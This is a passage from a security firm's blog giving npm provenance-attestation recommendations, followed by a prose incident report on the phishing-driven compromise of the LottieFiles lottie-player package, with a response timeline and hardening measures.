  • Enable provenance attestation immediately
  • Document provenance status in README files
  • Use GitHub Actions for automated, verified builds

2. Package Users:

  • Check provenance status before adding new dependencies
  • Prefer packages with enabled provenance. Check websites such as TrustyPkg to understand a package’s trustworthiness based on activity, provenance, and more
  • Monitor existing dependencies for provenance adoption

3. Platform Providers:

  • Make provenance status more visible in NPM registry UI
  • Provide tools for bulk provenance verification
  • Consider making provenance mandatory for high-impact packages
  • Implement server-side enforcement mechanisms
  • Add client-side verification tools

4. NPM Registry

  • Add organization-level provenance requirements
  • Implement mandatory attestation for popular packages
  • Provide API endpoints for provenance verification
  • Provide package approval process / workflow

Conclusion

The security of the NPM ecosystem affects millions of applications worldwide. The current lack of enforcement mechanisms at both the registry and client levels creates a significant security risk. While provenance attestation is available, the inability to enforce it systematically leaves the ecosystem vulnerable to supply chain attacks.

The NPM team should prioritize implementing both server-side and client-side enforcement mechanisms. Until then, the community must rely on manual verification and best practices. Package maintainers should enable provenance attestation immediately, while users should demand better security controls and verification tools.

Only by working together to improve NPM’s infrastructure can we create a more secure JavaScript ecosystem. At Exaforce, we’re committed to taking the first step by helping open-source libraries adopt provenance attestation in their publishing process.

References

[1] Resolution of Security Incident with @lottiefiles/lottie-player Package

[2] Supply Chain Security Incident: Analysis of the LottieFiles NPM Package Compromise

[3] TrustyPkg Lottie verification database for developers to consume secure open source libraries

November 1, 2024

Exaforce’s response to the LottieFiles npm package compromise

Analyzing the supply chain attack and steps taken to secure the ecosystem

On October 30th, 2024, Exaforce’s Incident Response team was engaged by LottieFiles following the discovery of a sophisticated supply chain attack targeting their popular lottie-player NPM package.

  • The incident involved the compromise of a package maintainer’s credentials through a phishing attack, resulting in the distribution of malicious code designed to target cryptocurrency wallets used in the DeFi and Web3 community.
  • LottieFiles moved rapidly, and together we were able to contain the attack within an hour, minimizing potential impact on the package’s extensive user base, estimated at over 11 million daily active users.
  • Throughout the process, LottieFiles demonstrated commendable speed and commitment to its community of users.

Exaforce is committed to ensuring LottieFiles is able to serve its community with the trust it has gained over the years. Key actions taken:

  • Helping the team at LottieFiles implement NPM package provenance attestation, providing cryptographic verification of package origins and build processes, plus continuous detection and response.
  • Remaining actively engaged with LottieFiles to strengthen their security posture and continue monitoring of critical systems.
  • Preparing a follow-up post-incident blog where we will share additional learnings and suggestions on best practices.

Official details of the incident report here:

About LottieFiles and NPM Packages

LottieFiles has revolutionized web animation by providing developers with tools to implement lightweight, scalable animations across platforms. At the heart of their ecosystem lies the lottie-player NPM package, which serves over 9 million lifetime users and averages 94,000 weekly downloads. NPM packages form the backbone of modern JavaScript development, acting as building blocks that developers use to construct applications efficiently and securely. In the software supply chain, these packages represent both incredible value and potential vulnerability points, making their security paramount.

Attack Overview and Impact

The incident began with a sophisticated phishing campaign targeting LottieFiles developers. The attacker (email notify.npmjs@pm.me) sent a carefully crafted phishing email, with an invitation to collaborate on the @lottiefiles/jlottie npm package, to a developer’s private Gmail account that was registered with NPM. Through this social engineering attack, the threat actor successfully harvested both NPM credentials and two-factor authentication codes from the targeted developer.

Using compromised credentials, the attacker executed their campaign on October 30th, 2024, between 19:00 UTC and 20:00 UTC, publishing three malicious versions of the lottie-player package (2.0.5, 2.0.6, and 2.0.7) directly to the NPM registry. This manual publication bypassed LottieFiles’ standard GitHub Actions deployment pipeline.

The attack’s distribution mechanism proved particularly effective due to the nature of modern web development practices. The compromised versions rapidly propagated through major Content Delivery Networks (CDNs), affecting websites configured to automatically pull the latest library version. This auto-update feature, typically a security benefit, became an attack vector that significantly amplified the incident’s reach.

Important Lessons Learned

In the process of handling this incident we’ve come to the conclusion that the current NPM package distribution model presents significant security challenges that should concern enterprise organizations relying on it for their JavaScript dependencies. While GitHub (after its acquisition of NPM and subsequent deprecation of NPM Enterprise) is promoting a migration strategy, there are critical security gaps in the existing npmjs.com offerings — lack of SSO for users, no logs for upstreaming or usage of packages, limited integrity checks, lack of OIDC support for automated systems, and no controls on distribution through CDNs. These limitations collectively represent a substantial security deficit in what has become the backbone of modern JavaScript development, potentially exposing organizations to supply chain attacks and compliance issues. We, along with LottieFiles, will work with npmjs and GitHub to improve the current gaps in such a vital software supply chain.

Incident Detection and Response Timeline

The incident was first reported through LottieFiles’ community website at approximately 19:24 UTC on October 30th, when users began noticing suspicious wallet connection prompts. Exaforce’s incident response team, working in conjunction with LottieFiles, implemented immediate countermeasures:

  • October 30th, 19:24 UTC: Initial detection and report
  • October 30th, 19:30 UTC: Impacted package versions (2.0.5, 2.0.6, 2.0.7) deleted
  • October 30th, 19:35 UTC: Revocation of compromised NPM access tokens
  • October 30th, 19:58 UTC: Publication of clean version 2.0.8
  • October 31st, 02:35 UTC: Removal of affected developer’s NPM access
  • October 31st, 02:40 UTC: Access of individual developers to NPM repositories revoked
  • October 31st, 02:45 UTC: All NPM keys, as well as keys for other systems, revoked and NPM automations suspended
  • October 31st, 03:30 UTC: Laptop in question quarantined for further post-incident analysis
  • October 31st, 03:35 UTC: Begin forensics on the compromised laptop
  • October 31st, 03:55 UTC: Coordination with major CDN providers to purge compromised files
  • October 31st, 04:00 UTC: First official X (Twitter) post by LottieFiles
  • October 31st, 20:06 UTC: All infected files removed from downstream CDNs (cdnjs.com, unpkg.com) with the help of the community operators
  • November 1st, 01:59 UTC: Second official update on X (Twitter) post by LottieFiles

Hardening Effort Towards a More Secure LottieFiles

In response to this incident, we are working with LottieFiles to implement comprehensive security improvements across their infrastructure. Key measures include:

  1. Implementation of NPM package provenance attestation and continuous monitoring of this, providing cryptographic verification of package origins and build processes. This ensures that packages are built and published through verified GitHub workflows only, eliminating the risk of direct human publishing.
  2. Understanding the posture of human and machine identities in critical systems. Machine identities, including credentials, are the most common threat vector in the cloud today. Gaining visibility into these identities, how they are being used and by whom is critical to establishing a strong cloud security posture.
  3. Real-time monitoring and threat detection coverage across all critical systems leveraging a combination of Exaforce AI-BOTs and our Managed Cloud Detection & Response service.

Stay tuned for a follow-up where we will share our learnings from helping LottieFiles establish industry-leading Security Engineering and Operations by augmenting their existing teams with task-specific AI bots. Only by working together to improve NPM’s infrastructure can we create a more secure JavaScript ecosystem. At Exaforce, we’re committed to taking the first step by helping open-source libraries adopt provenance attestation in their publishing process.

